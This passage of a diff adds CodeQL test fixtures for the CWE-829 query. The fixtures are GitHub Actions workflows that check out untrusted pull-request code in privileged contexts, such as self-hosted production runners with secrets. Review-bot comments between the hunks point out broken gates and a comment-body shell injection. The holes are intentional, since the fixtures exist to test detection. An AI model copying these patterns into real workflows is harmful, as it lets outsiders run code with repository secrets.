+ - opened
+ - reopened
+
+jobs:
+ updateJira:
+ if: github.actor != 'dependabot[bot]'
+ runs-on: ubuntu-latest
+ steps:
+ - name: Checkout repository
+ uses: actions/checkout@v4
+
+ - name: Extract Jira Key
+ run: echo ISSUE_KEY=$(echo "${{ github.event.pull_request.title }}") >> $GITHUB_ENV
+
+ - name: Sink
+ run: echo ${{ env.ISSUE_KEY }}
+
+
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test10.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test10.yml
new file mode 100644
index 000000000000..e8b5466f7516
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test10.yml
@@ -0,0 +1,37 @@
+name: Build Android app (stripe)
+on:
+ push:
+ branches:
+ - main
+ - fix-ci
+ workflow_dispatch:
+ pull_request_target:
+ branches:
+ - main
+ paths:
+ - 'custom-payment-flow/client/android-kotlin/**'
+ - '!**.css'
+ - '!**.md'
+
+jobs:
+ android_build:
+ runs-on: ubuntu-latest
+ steps:
+ - name: Checkout code
+ uses: actions/checkout@v4
+ with:
+ ref: ${{ github.event.after || github.event.pull_request.head.sha }}
+
+ - name: Build
+ working-directory: custom-payment-flow/client/android-kotlin
+ run: |
+ ./gradlew build
+
+ dependabot-auto-merge:
+ if: ${{ github.event.pull_request && github.actor == 'dependabot[bot]' }}
+ needs: android_build
+ permissions:
+ contents: write
+ pull-requests: write
+ uses: ./.github/workflows/wf_dependabot.yaml
+ secrets: inherit
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test11.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test11.yml
new file mode 100644
index 000000000000..16bb6bf876c3
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test11.yml
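Review bot: `ref: ${{ github.event.after || github.event.pull_request.head.sha }}` resolves differently per trigger (`after` on `push`, the PR head sha on `pull_request_target`, neither on `workflow_dispatch`), and the fixture does not say which of those cases the query is expected to flag; a comment on the `Checkout code` step such as `# expected: alert only for the pull_request_target path (head.sha of the PR)` would pin that. The `dependabot-auto-merge` job calls `./.github/workflows/wf_dependabot.yaml` with `secrets: inherit`, and that local workflow is not in the fixture set as far as visible, so if the query follows local `uses:` references the missing file should be noted or stubbed.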
@@ -0,0 +1,94 @@ +name: Test + +on: + + issue_comment: + types: [created] + +jobs: + + deploy: + name: Update deployment + if: >- + ${{ + github.event.issue.pull_request && + (contains(github.event.comment.body, '/deploy') || contains(github.event.comment.body, '/rollback')) && + contains(github.event.issue.labels.*.name, 'Deployment Update') && + github.event.comment.user.type != 'Bot' + }} + + runs-on: [self-hosted, production] + + permissions: + contents: write + issues: write + pull-requests: write + statuses: write + + steps: + + - name: Check comment keywords + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + PR_COMMENT_ALLOW_LIST: ${{ secrets.PR_COMMENT_ALLOW_LIST }} + run: | + function list_subset { local list1="$1"; local list2="$2"; result=0; for item in $list2; do if ! [[ $list1 =~ (^|[[:space:]])"$item"($|[[:space:]]) ]]; then result=1; fi; done; return $result; } + + if `list_subset "echo $PR_COMMENT_ALLOW_LIST" "echo $COMMENT_BODY"` ; then + echo "Command keywords allowed. Proceeding!" + else + echo "Command keywords not allowed. Skipping!" 
+ exit 1 + fi + + - name: Get environment from comment + id: environment + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + COMMENT_AT: ${{ github.event.comment.created_at }} + GH_REPO: ${{ github.repository }} + PR_NUMBER: ${{ github.event.issue.number }} + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + pr="$(gh api /repos/${GH_REPO}/pulls/${PR_NUMBER})" + head_sha="$(echo "$pr" | jq -r .head.sha)" + pushed_at="$(echo "$pr" | jq -r .pushed_at)" + + if [[ $(date -d "$pushed_at" +%s) -gt $(date -d "$COMMENT_AT" +%s) ]]; then + echo "Deployment not allowed because the PR was pushed to (at $pushed_at) after the triggering comment was issued (at $COMMENT_AT)" + exit 1 + fi + + target=$(echo "$COMMENT_BODY" | sed 's/.* //') && \ + deploy_type=$(echo "$COMMENT_BODY" | sed 's/ .*//') + + if [[ $target == "scorer" ]]; then + echo "env=async scorer" >> $GITHUB_OUTPUT + else + env=$(echo "$target") + echo "env=$env" >> $GITHUB_OUTPUT + fi + + if [[ $deploy_type == "/deploy" ]]; then + echo "depl=deployment" >> $GITHUB_OUTPUT + elif [[ $deploy_type == "/rollback" ]]; then + echo "depl=rollback" >> $GITHUB_OUTPUT + else + echo "depl=unknown deployment type" >> $GITHUB_OUTPUT + fi + + echo "head_sha=$head_sha" >> $GITHUB_OUTPUT + + - name: Checkout PR branch + if: contains(github.event.comment.body, '/deploy') + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.environment.outputs.head_sha }} + + - name: Environment setup + uses: ./.github/actions/setup-env + with: + azure_creds: ${{ secrets.AZURE_CREDENTIALS }} + diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test12.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test12.yml new file mode 100644 index 000000000000..878b83779613 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test12.yml 
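Review bot: The freshness gate in `Get environment from comment` reads `pushed_at` from the `pulls/{n}` response, but as far as I know that object has no top-level `pushed_at` (it exists only on the nested repository objects), so `jq -r .pushed_at` yields `null`, `date -d null` fails, and the `-gt` comparison runs with an empty left operand (treated as 0 inside `[[ ]]`), which means the check passes for every comment. The same script appears in test12.yml and test14.yml. If the fixture is meant to model a working gate, comparing `COMMENT_AT` against the head commit's committer date (fetched by `head_sha`) would be the functional form; if it is a verbatim sample, `# note: .pushed_at is absent from the PR object, so this gate never rejects` keeps that explicit for readers of the expected output. Separately, `echo "env=$env" >> $GITHUB_OUTPUT` writes a comment-derived value that can contain newlines; the heredoc delimiter form of `GITHUB_OUTPUT` or a single-line check would be the safer idiom.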
@@ -0,0 +1,96 @@ +name: Test + +on: + + issue_comment: + types: [created] + +jobs: + + deploy: + name: Update deployment + if: > + github.event.issue.pull_request && + (contains(github.event.comment.body, '/deploy') || contains(github.event.comment.body, '/rollback')) && + contains(github.event.issue.labels.*.name, 'Deployment Update') && + github.event.comment.user.type != 'Bot' && + ( + github.event.issue.author_association == 'OWNER' || + github.event.issue.author_association == 'COLLABORATOR' || + github.event.issue.author_association == 'MEMBER' + ) + runs-on: [self-hosted, production] + + permissions: + contents: write + issues: write + pull-requests: write + statuses: write + + steps: + + - name: Check comment keywords + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + PR_COMMENT_ALLOW_LIST: ${{ secrets.PR_COMMENT_ALLOW_LIST }} + run: | + function list_subset { local list1="$1"; local list2="$2"; result=0; for item in $list2; do if ! [[ $list1 =~ (^|[[:space:]])"$item"($|[[:space:]]) ]]; then result=1; fi; done; return $result; } + + if `list_subset "echo $PR_COMMENT_ALLOW_LIST" "echo $COMMENT_BODY"` ; then + echo "Command keywords allowed. Proceeding!" + else + echo "Command keywords not allowed. Skipping!" 
+ exit 1 + fi + + - name: Get environment from comment + id: environment + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + COMMENT_AT: ${{ github.event.comment.created_at }} + GH_REPO: ${{ github.repository }} + PR_NUMBER: ${{ github.event.issue.number }} + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + pr="$(gh api /repos/${GH_REPO}/pulls/${PR_NUMBER})" + head_sha="$(echo "$pr" | jq -r .head.sha)" + pushed_at="$(echo "$pr" | jq -r .pushed_at)" + + if [[ $(date -d "$pushed_at" +%s) -gt $(date -d "$COMMENT_AT" +%s) ]]; then + echo "Deployment not allowed because the PR was pushed to (at $pushed_at) after the triggering comment was issued (at $COMMENT_AT)" + exit 1 + fi + + target=$(echo "$COMMENT_BODY" | sed 's/.* //') && \ + deploy_type=$(echo "$COMMENT_BODY" | sed 's/ .*//') + + if [[ $target == "scorer" ]]; then + echo "env=async scorer" >> $GITHUB_OUTPUT + else + env=$(echo "$target") + echo "env=$env" >> $GITHUB_OUTPUT + fi + + if [[ $deploy_type == "/deploy" ]]; then + echo "depl=deployment" >> $GITHUB_OUTPUT + elif [[ $deploy_type == "/rollback" ]]; then + echo "depl=rollback" >> $GITHUB_OUTPUT + else + echo "depl=unknown deployment type" >> $GITHUB_OUTPUT + fi + + echo "head_sha=$head_sha" >> $GITHUB_OUTPUT + + - name: Checkout PR branch + if: contains(github.event.comment.body, '/deploy') + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.environment.outputs.head_sha }} + + - name: Environment setup + uses: ./.github/actions/setup-env + with: + azure_creds: ${{ secrets.AZURE_CREDENTIALS }} + diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test13.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test13.yml new file mode 100644 index 000000000000..0a73e86d5fc6 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test13.yml 
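Review bot: The added `author_association` guard in the job-level `if:` checks `github.event.issue.author_association`, which on an `issue_comment` event is the association of the PR author, not of the person who posted the `/deploy` or `/rollback` comment; the commenter's association is `github.event.comment.author_association`. If this fixture is meant to be the "gated" counterpart of test11.yml, that distinction is the whole point and deserves a comment, e.g. `# note: gate keyed on the PR author (issue.author_association), not the commenter (comment.author_association)`, plus a statement of the verdict the query should produce for it. The `pushed_at` freshness check in this hunk has the same problem I noted on test11.yml, and test14.yml (whose hunk runs past the end of this page) compares `github.event.pull_request.author_association`, a field that does not exist in an `issue_comment` payload, so those inequality checks are vacuously true.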
@@ -0,0 +1,31 @@
+on:
+ issue_comment:
+ types:
+ - created
+jobs:
+ danger-for-external:
+ name: Danger for external - Node.js 16
+ if: |
+ github.event_name == 'issue_comment' && github.event.action == 'created'
+ && github.event.issue.pull_request != null
+ && startsWith(github.event.comment.body, '/danger')
+ runs-on: ubuntu-latest
+ steps:
+ - name: Check repository permission for user
+ uses: sushichop/action-repository-permission@v2
+ with:
+ required-permission: write
+ reaction-permitted: rocket
+ comment-not-permitted: Sorry, you don't have enough permission to execute `/danger`...
+ - name: Clone the PR source
+ uses: actions/checkout@v3
+ with:
+ ref: refs/pull/${{ github.event.issue.number }}/head
+ fetch-depth: 0
+ - uses: actions/setup-node@v3
+ with:
+ node-version: 16
+ - name: Danger JS
+ run: npx danger ci
+ env:
+ GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test14.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test14.yml
new file mode 100644
index 000000000000..6f03a0e966a1
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test14.yml
@@ -0,0 +1,227 @@ +name: Autodeploy Model to AML + +on: + + issue_comment: + types: [created] + +jobs: + + security-checks: + + name: Carry out security checks + if: >- + ${{ + github.event.issue.pull_request && + (contains(github.event.comment.body, '/deploy') || contains(github.event.comment.body, '/rollback')) && + contains(github.event.issue.labels.*.name, 'Deployment Update') && + github.event.comment.user.type != 'Bot' && + github.event.pull_request.author_association != 'FIRST_TIMER' && + github.event.pull_request.author_association != 'FIRST_TIME_CONTRIBUTOR' && + github.event.pull_request.author_association != 'MANNEQUIN' && + github.event.pull_request.author_association != 'NONE' + }} + + runs-on: ubuntu-latest + + defaults: + run: + shell: bash + + permissions: + contents: write + issues: write + pull-requests: write + + steps: + + - name: Install GH CLI + uses: dev-hanz-ops/install-gh-cli-action@8fff9050dae2d81b38f94500d8b74ad1d1d47410 #v0.2.0 + + - name: Install jq + run: sudo apt-get update && sudo apt-get install -y jq + + - name: Check comment keywords + env: + COMMENT_BODY: ${{ github.event.comment.body }} + PR_COMMENT_ALLOW_LIST: ${{ secrets.PR_COMMENT_ALLOW_LIST }} + run: | + function list_subset { local list1="$1"; local list2="$2"; result=0; for item in $list2; do if ! [[ $list1 =~ (^|[[:space:]])"$item"($|[[:space:]]) ]]; then result=1; fi; done; return $result; } + + if `list_subset "echo $PR_COMMENT_ALLOW_LIST" "echo $COMMENT_BODY"` ; then + echo "Command keywords allowed. Proceeding!" + else + echo "Command keywords not allowed. Skipping!" 
+ exit 1 + fi + + - name: Check for conflicting pushes + id: environment + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + COMMENT_AT: ${{ github.event.comment.created_at }} + GH_REPO: ${{ github.repository }} + PR_NUMBER: ${{ github.event.issue.number }} + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + pr="$(gh api /repos/${GH_REPO}/pulls/${PR_NUMBER})" + pushed_at="$(echo "$pr" | jq -r .pushed_at)" + + if [[ $(date -d "$pushed_at" +%s) -gt $(date -d "$COMMENT_AT" +%s) ]]; then + echo "Deployment not allowed because the PR was pushed to (at $pushed_at) after the triggering comment was issued (at $COMMENT_AT)" + exit 1 + fi + + deploy: + + name: Update deployment + needs: security-checks + runs-on: [self-hosted, production] + + permissions: + contents: write + issues: write + pull-requests: write + statuses: write + + steps: + + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@d97294d304604fa98a2600a6e2f916a84b596dc7 # v2.0.0 + id: comment-branch + + - name: Set latest commit status as pending + uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 + with: + sha: ${{ steps.comment-branch.outputs.head_sha }} + token: ${{ secrets.GITHUB_TOKEN }} + status: pending + + - name: Checkout main + if: contains(github.event.comment.body, '/rollback') + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + + - name: Checkout PR branch + if: contains(github.event.comment.body, '/deploy') + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + - name: Get environment from comment + id: environment + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + run: | + target=$(echo "$COMMENT_BODY" | sed 's/.* //') && \ + deploy_type=$(echo "$COMMENT_BODY" | sed 's/ .*//') + + if [[ $target == "scorer" ]]; then + echo "env=async scorer" >> $GITHUB_OUTPUT + else + env=$(echo "$target") + echo 
"env=$env" >> $GITHUB_OUTPUT + fi + + if [[ $deploy_type == "/deploy" ]]; then + echo "depl=deployment" >> $GITHUB_OUTPUT + elif [[ $deploy_type == "/rollback" ]]; then + echo "depl=rollback" >> $GITHUB_OUTPUT + else + echo "depl=unknown deployment type" >> $GITHUB_OUTPUT + fi + + - name: Get email of actor + id: email + run: | + email="${{ github.actor }}@github.com" + echo "email=$email" >> $GITHUB_OUTPUT + + - name: Lookup Slack ID + id: slack-id + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + run: | + slack_id=$(curl -s -H "Authorization: Bearer $SLACK_BOT_TOKEN" "https://slack.com/api/users.lookupByEmail?email=${{ steps.email.outputs.email }}" | jq -r '.user.id') + echo "slack-id=$slack_id" >> $GITHUB_OUTPUT + + - name: Notify deployment start in slack + id: slack-initiate + uses: slackapi/slack-github-action@37ebaef184d7626c5f204ab8d3baff4262dd30f0 # v1.27.0 + with: + channel-id: 'C05N5U3HH2M' # platform-health-ml-ops + payload: | + { + "blocks": [ + { + "type": "section", + "text": { + "type": "mrkdwn", + "text": "<@${{ steps.slack-id.outputs.slack-id }}>'s ${{ steps.environment.outputs.depl }} of <${{ github.event.issue.html_url }}|${{ github.event.issue.title }} #${{ github.event.issue.number }}> to ${{ steps.environment.outputs.env }} is in progress..." 
+ } + } + ] + } + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + + - name: Environment setup + uses: ./.github/actions/setup-env + with: + azure_creds: ${{ secrets.AZURE_CREDENTIALS }} + + - name: Deploy server + if: >- + ${{ + (contains(github.event.comment.body, '/deploy to') || + contains(github.event.comment.body, '/rollback')) && + !contains(github.event.comment.body, 'scorer') + }} + env: + BOT_TOKEN: ${{ secrets.GITHUB_TOKEN }} + PR_NUMBER: ${{ github.event.issue.number }} + COMMENT_BODY: ${{ github.event.comment.body }} + run: poetry run python server.py --endpoint_location=remote --autodeploy=True + + - name: Deploy scorer + if: >- + ${{ + contains(github.event.comment.body, '/deploy as async scorer') || + contains(github.event.comment.body, '/rollback async scorer') + }} + env: + BOT_TOKEN: ${{ secrets.GITHUB_TOKEN }} + PR_NUMBER: ${{ github.event.issue.number }} + run: poetry run python scorer.py --as_pipeline=True --schedule=True --autodeploy=True + + - name: Set latest commit status as ${{ job.status }} + uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 + if: always() + with: + sha: ${{ steps.comment-branch.outputs.head_sha }} + token: ${{ secrets.GITHUB_TOKEN }} + status: ${{ job.status }} + + - name: Report deployment outcome in slack + uses: slackapi/slack-github-action@37ebaef184d7626c5f204ab8d3baff4262dd30f0 # v1.27.0 + if: always() + with: + channel-id: 'C05N5U3HH2M' # platform-health-ml-ops + payload: | + { + "blocks": [ + { + "type": "section", + "text": { + "type": "mrkdwn", + "text": "<@${{ steps.slack-id.outputs.slack-id }}>'s ${{ steps.environment.outputs.depl }} of <${{ github.event.issue.html_url }}|${{ github.event.issue.title }} #${{ github.event.issue.number }}> to ${{ steps.environment.outputs.env }} is complete!\n*Status: ${{ job.status }}*" + } + } + ] + } + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + + - name: prune docker images + run: docker system prune --all 
--force diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test15.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test15.yml new file mode 100644 index 000000000000..0be96a4140ef --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test15.yml 
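Review bot: The `security-checks` gate compares `github.event.pull_request.author_association`, but an `issue_comment` payload carries `issue` and `comment` rather than `pull_request`, so each `!=` test compares an empty value and excludes nobody; the same expression appears in test15.yml. The `deploy` job then checks out `steps.comment-branch.outputs.head_ref` (a branch) while the commit status is set on `head_sha`, so the push-time check in the earlier job does not pin what is actually built on the `[self-hosted, production]` runner. If the fixture is meant to model a gate that does not actually gate, a comment saying so keeps it from being "corrected" later; otherwise `github.event.comment.author_association` is the field such a check would read.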
@@ -0,0 +1,271 @@ +name: Kickoff custom pipeline + +on: + + issue_comment: + types: [created] + +jobs: + + security-checks: + + name: Carry out security checks + if: >- + ${{ + github.event.issue.pull_request && + contains(github.event.comment.body, '/kickoff') && + contains(github.event.issue.labels.*.name, 'Pipeline Kickoff') && + github.event.comment.user.type != 'Bot' && + github.event.pull_request.author_association != 'FIRST_TIMER' && + github.event.pull_request.author_association != 'FIRST_TIME_CONTRIBUTOR' && + github.event.pull_request.author_association != 'MANNEQUIN' && + github.event.pull_request.author_association != 'NONE' + }} + + runs-on: ubuntu-latest + + defaults: + run: + shell: bash + + permissions: + contents: write + issues: write + pull-requests: write + + steps: + + - name: Check for conflicting pushes + id: environment + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + COMMENT_AT: ${{ github.event.comment.created_at }} + GH_REPO: ${{ github.repository }} + PR_NUMBER: ${{ github.event.issue.number }} + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + pr="$(gh api /repos/${GH_REPO}/pulls/${PR_NUMBER})" + pushed_at="$(echo "$pr" | jq -r .pushed_at)" + + if [[ $(date -d "$pushed_at" +%s) -gt $(date -d "$COMMENT_AT" +%s) ]]; then + echo "Deployment not allowed because the PR was pushed to (at $pushed_at) after the triggering comment was issued (at $COMMENT_AT)" + exit 1 + fi + + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@d97294d304604fa98a2600a6e2f916a84b596dc7 # v2.0.0 + id: comment-branch + + - name: Checkout PR branch + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + - name: Install GH CLI + uses: dev-hanz-ops/install-gh-cli-action@8fff9050dae2d81b38f94500d8b74ad1d1d47410 #v0.2.0 + + - name: Check comment keywords + env: + COMMENT_BODY: ${{ github.event.comment.body }} + PR_COMMENT_ALLOW_LIST: ${{ 
secrets.PR_COMMENT_ALLOW_LIST }} + run: | + function list_subset { local list1="$1"; local list2="$2"; result=0; for item in $list2; do if ! [[ $list1 =~ (^|[[:space:]])"$item"($|[[:space:]]) ]]; then result=1; fi; done; return $result; } + full_allowlist="$PR_COMMENT_ALLOW_LIST $(ls models)" + + if `list_subset "echo $full_allowlist" "echo $COMMENT_BODY"` ; then + echo "Command keywords allowed. Proceeding!" + else + echo "Command keywords not allowed. Skipping!" + exit 1 + fi + + docker-environment-creation: + + name: Build and push docker image + needs: security-checks + if: >- + ${{ + contains(github.event.comment.body, 'rebuild') && + contains(github.event.issue.labels.*.name, 'Pipeline Kickoff') && + needs.security-checks.result == 'success' + }} + runs-on: [self-hosted, production] + + permissions: + contents: write + + defaults: + run: + # Run bash like it came from an interactive login, to make it so that + # the .bashrc gets loaded. + shell: bash -l {0} + + steps: + + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@d97294d304604fa98a2600a6e2f916a84b596dc7 # v2 + id: comment-branch + + - name: Checkout PR branch + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + - name: Log into Azure + uses: azure/login@a65d910e8af852a8061c627c456678983e180302 # @v2.2.0 + with: + creds: ${{ secrets.AZURE_CREDENTIALS }} + + - name: Container registry login + run: | + echo "Logging into $REGISTRY" + az acr login --name ${REGISTRY} + env: + REGISTRY: ${{ secrets.DOCKER_REGISTRY }} + + - name: Prune old images + run: | + docker system prune -a -f + + - name: Create image + run: | + model=$(echo "${{ github.event.comment.body }}" | sed 's/.*kickoff //' | sed 's/ .*//') + script/build_aml_image -m $model + + - name: Push image + run: | + model=$(echo "${{ github.event.comment.body }}" | sed 's/.*kickoff //' | sed 's/ .*//') + script/push_aml_image -m $model + + 
kickoff-pipeline: + + name: Kickoff pipeline + needs: [security-checks, docker-environment-creation] + if: >- + ${{ + always() && + needs.security-checks.result == 'success' && + needs.docker-environment-creation.result != 'failure' && + needs.docker-environment-creation.result != 'cancelled' + }} + + runs-on: [self-hosted, production] + + permissions: + contents: write + issues: write + pull-requests: write + statuses: write + + defaults: + run: + # Run bash like it came from an interactive login, to make it so that + # the .bashrc gets loaded. + shell: bash -l {0} + + steps: + + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@d97294d304604fa98a2600a6e2f916a84b596dc7 # v2 + id: comment-branch + + - name: Set latest commit status as pending + uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 + with: + sha: ${{ steps.comment-branch.outputs.head_sha }} + token: ${{ secrets.GITHUB_TOKEN }} + status: pending + + - name: Checkout PR branch + uses: actions/checkout@v4 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + - name: Get pipeline info from comment + id: pipeline-info + run: | + model=$(echo "${{ github.event.comment.body }}" | sed 's/.*kickoff //' | sed 's/ .*//') && \ + scheduling=$(echo "${{ github.event.comment.body }}" | grep schedule | wc -l) && \ + echo "mdl=$model" >> $GITHUB_OUTPUT + if [[ $scheduling == 1 ]]; then + echo "schedule=True" >> $GITHUB_OUTPUT + else + echo "schedule=False" >> $GITHUB_OUTPUT + fi + + - name: Get email of actor + id: email + run: | + email="${{ github.actor }}@github.com" + echo "email=$email" >> $GITHUB_OUTPUT + + - name: Lookup Slack ID + id: slack-id + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + run: | + slack_id=$(curl -s -H "Authorization: Bearer $SLACK_BOT_TOKEN" "https://slack.com/api/users.lookupByEmail?email=${{ steps.email.outputs.email }}" | jq -r '.user.id') + echo "slack-id=$slack_id" >> $GITHUB_OUTPUT + + - name: Submit 
pipeline kickoff message to slack + id: slack-initiate + uses: slackapi/slack-github-action@37ebaef184d7626c5f204ab8d3baff4262dd30f0 # v1.27.0 + with: + channel-id: 'C05N5U3HH2M' # platform-health-ml-ops + payload: | + { + "blocks": [ + { + "type": "section", + "text": { + "type": "mrkdwn", + "text": "<@${{ steps.slack-id.outputs.slack-id }}>'s kickoff of <${{ github.event.issue.html_url }}|${{ steps.pipeline-info.outputs.mdl }}> model is in progress..." + } + } + ] + } + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + + - name: Environment setup + uses: ./.github/actions/setup-env + with: + azure_creds: ${{ secrets.AZURE_CREDENTIALS }} + + - name: Kickoff run + if: contains(github.event.comment.body, '/kickoff') + env: + BOT_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: poetry run python trainer.py --model=${{ steps.pipeline-info.outputs.mdl }} --as_pipeline=True --schedule=${{ steps.pipeline-info.outputs.schedule }} + + - name: Set latest commit status as ${{ job.status }} + uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 + if: always() + with: + sha: ${{ steps.comment-branch.outputs.head_sha }} + token: ${{ secrets.GITHUB_TOKEN }} + status: ${{ job.status }} + + - name: Report pipeline's run outcome to slack + uses: slackapi/slack-github-action@37ebaef184d7626c5f204ab8d3baff4262dd30f0 # v1.27.0 + if: always() + with: + channel-id: 'C05N5U3HH2M' # platform-health-ml-ops + payload: | + { + "blocks": [ + { + "type": "section", + "text": { + "type": "mrkdwn", + "text": "<@${{ steps.slack-id.outputs.slack-id }}>'s kickoff of <${{ github.event.issue.html_url }}|${{ steps.pipeline-info.outputs.mdl }}> model is complete!\n*Status: ${{ job.status }}*" + } + } + ] + } + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + + - name: Prune docker images + run: docker system prune --all --force 
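Review bot: The `Create image`, `Push image` and `Get pipeline info from comment` steps interpolate `${{ github.event.comment.body }}` directly into the `run:` script, whereas the `security-checks` job reads the same value through the `COMMENT_BODY` env var. That inconsistency drags an unrelated expression-injection pattern into a CWE-829 fixture and may produce findings from other queries that are not the point of this test. Using the env-var form in those three steps, `env: COMMENT_BODY: ${{ github.event.comment.body }}` with `model=$(echo "$COMMENT_BODY" | sed 's/.*kickoff //' | sed 's/ .*//')`, keeps the fixture focused on the checkout.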
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test16.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test16.yml new file mode 100644 index 000000000000..4ceb9a4c72ff --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test16.yml 
@@ -0,0 +1,294 @@ +name: Post-Build +run-name: Post-Build on ${{ github.event.workflow_run.head_branch }} +on: + workflow_run: + types: [ 'completed' ] + workflows: + - Build +concurrency: + # Cancel concurrent jobs on pull_request but not push, by including the run_id in the concurrency group for the latter. + group: post-build-${{ github.event.workflow_run.event == 'push' && github.run_id || 'pr' }}-${{ github.event.workflow_run.head_branch }} + cancel-in-progress: true + +env: + COMPOSER_ROOT_VERSION: "dev-trunk" + SUMMARY: Post-Build run [#${{ github.run_id }}](${{ github.server_url }}/${{ github.repository }}/actions/runs/${{ github.run_id }}) for Build run [#${{ github.event.workflow_run.id }}](${{ github.event.workflow_run.html_url }}) + +permissions: + actions: read + contents: read + pull-requests: read + +# Note the job logic here is a bit unusual. That's because this workflow is triggered by `workflow_run`, and so is not shown on the PR by default. +# Instead we have to manually report back, including where we could normally just skip or let a failure be handled. +# - If the "Build" job failed, we need to set our status as failed too (build_failed). +# - If the find_artifact job fails for some reason, we need a step to explicitly report that back. +# - If no plugins are found, we need to explicitly report back a "skipped" status. +# - And the upgrade_test job both explicitly sets "in progress" at its start and updates at its end. +# +# If you're wanting to add a new check, you'd want to do the following: +# - Add a step in the `setup` workflow to create your check, and a corresponding output for later steps to have the ID. +# - Add a step in the `build_failed` workflow to set your run to cancelled. +# - Add a job to run whatever tests you need to run, with steps similar to the `upgrade_test` workflow's "Get token", "Notify check in progress", and "Notify final status". 
+# - Add a step in the `no_plugins` workflow to set your run to skipped if your job only runs when there are plugins built. + +jobs: + setup: + name: Setup + runs-on: ubuntu-latest + timeout-minutes: 2 # 2022-12-20: Seems like it should be fast. + outputs: + upgrade_check: ${{ steps.upgrade_check.outputs.id }} + steps: + - name: Log info + run: | + echo "$SUMMARY" >> $GITHUB_STEP_SUMMARY + + - uses: actions/checkout@v4 + + - name: Get token + id: get_token + uses: ./.github/actions/gh-app-token + with: + app_id: ${{ secrets.JP_LAUNCH_CONTROL_ID }} + private_key: ${{ secrets.JP_LAUNCH_CONTROL_KEY }} + + - name: 'Create "Test plugin upgrades" check' + id: upgrade_check + uses: ./.github/actions/check-run + with: + name: Test plugin upgrades + sha: ${{ github.event.workflow_run.head_sha }} + status: queued + title: Test queued... + summary: | + ${{ env.SUMMARY }} + token: ${{ steps.get_token.outputs.token }} + + build_failed: + name: Handle build failure + runs-on: ubuntu-latest + needs: setup + if: github.event.workflow_run.conclusion != 'success' + timeout-minutes: 2 # 2022-08-26: Seems like it should be fast. + steps: + - uses: actions/checkout@v4 + + - name: Get token + id: get_token + uses: ./.github/actions/gh-app-token + with: + app_id: ${{ secrets.JP_LAUNCH_CONTROL_ID }} + private_key: ${{ secrets.JP_LAUNCH_CONTROL_KEY }} + + - name: 'Mark "Test plugin upgrades" cancelled' + uses: ./.github/actions/check-run + with: + id: ${{ needs.setup.outputs.upgrade_check }} + conclusion: cancelled + title: Build failed + summary: | + ${{ env.SUMMARY }} + + Post-build run aborted because the build did not succeed. + token: ${{ steps.get_token.outputs.token }} + + find_artifact: + name: Find artifact + runs-on: 